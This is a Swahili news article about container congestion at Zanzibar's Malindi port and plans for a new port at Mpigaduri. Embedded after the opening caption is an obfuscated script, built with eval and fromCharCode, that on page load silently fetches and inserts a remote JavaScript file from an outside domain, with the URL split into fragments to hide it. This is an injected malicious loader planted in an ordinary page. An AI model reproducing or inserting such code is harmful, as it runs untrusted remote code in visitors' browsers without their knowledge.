<p>Mkurugenzi Mkuu wa Shirika la Bandari la Zanzibar, Abdalla Juma </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
SHIRIKA la Bandari la Zanzibar limekiri kuzidiwa na msongamano mkubwa wa makontena katika eneo la bandari na kutishia ufanisi wa utendaji wa kazi za kila siku za kutoa huduma kwa wateja.
Mkurugenzi Mkuu wa Shirika la Bandari la Zanzibar, Abdalla Juma alisema juhudi za haraka zinahitajika kupunguza tatizo la msongamano wa makontena katika bandari ya Malindi.
Alitaja juhudi hizo ni pamoja na ujenzi wa bandari nyingine ya kisasa katika eneo la Mpigaduri huko Maruhubi nje kidogo ya mji wa Zanzibar ambayo itakuwa na nafasi kubwa zaidi.
âTunakabiliwa na tatizo kubwa la msongamano wa makontena katika bandari ya Malindi kiasi cha kushuka kwa mapato na ufanisi wa utoaji wa huduma kwa wateja,â alisema.
Alisema tatizo la msongamano wa makontena katika Bandari ya Malindi limechangiwa kwa kiasi kikubwa na wafanyabiashara kushindwa kuchukua mizigo yao kwa wakati.
Juma alisema Shirika la Bandari limeanza kutumia sheria ambayo inawataka wamiliki wa bidhaa mbalimbali ikiwemo makontena kuhakikisha kwamba yanaondolewa kwa wakati si zaidi ya kipindi cha miezi mitatu.
âShirika la Bandari limeanza kutumia sheria inayowataka wafanyabiashara kuondoa mizigo yao si zaidi ya miezi mitatu katika eneo la bandari kwa ajili ya kupisha kutoa huduma za kazi,â alisema.
Serikali ya Mapinduzi ya Zanzibar ipo katika hatua za kukamilisha makubaliano na Serikali ya China kwa ajili ya kuanza ujenzi wa bandari ya kisasa Kwa Mpiga Duri mjini hapa.
Waziri wa Fedha na Uchumi, Omar Yussuf Mzee alisema serikali inakamilisha taratibu za kupata mkopo.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments